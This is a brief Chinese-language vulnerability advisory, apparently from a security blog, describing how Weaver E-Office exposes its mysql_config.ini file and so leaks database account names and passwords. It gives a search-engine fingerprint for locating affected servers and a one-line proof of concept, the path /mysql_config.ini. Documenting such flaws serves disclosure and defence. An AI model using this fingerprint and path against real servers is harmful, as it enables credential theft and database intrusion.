泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞

漏洞描述

泛微 E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息。

漏洞影响

泛微 E-Office

网络测绘

app=”泛微-EOffice”

漏洞复现

产品页面

20231208175033547-1628480634885-fb632cc0-9146-482e-80f3-b37c3e9b5990.ff04da16_2023-12-08_17-50-08 (1)

验证POC

/mysql_config.ini

20231208175125617-1628480658765-2ba02ffc-962a-48ac-a708-26bfaddf8182.98aac61d_2023-12-08_17-51-10 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容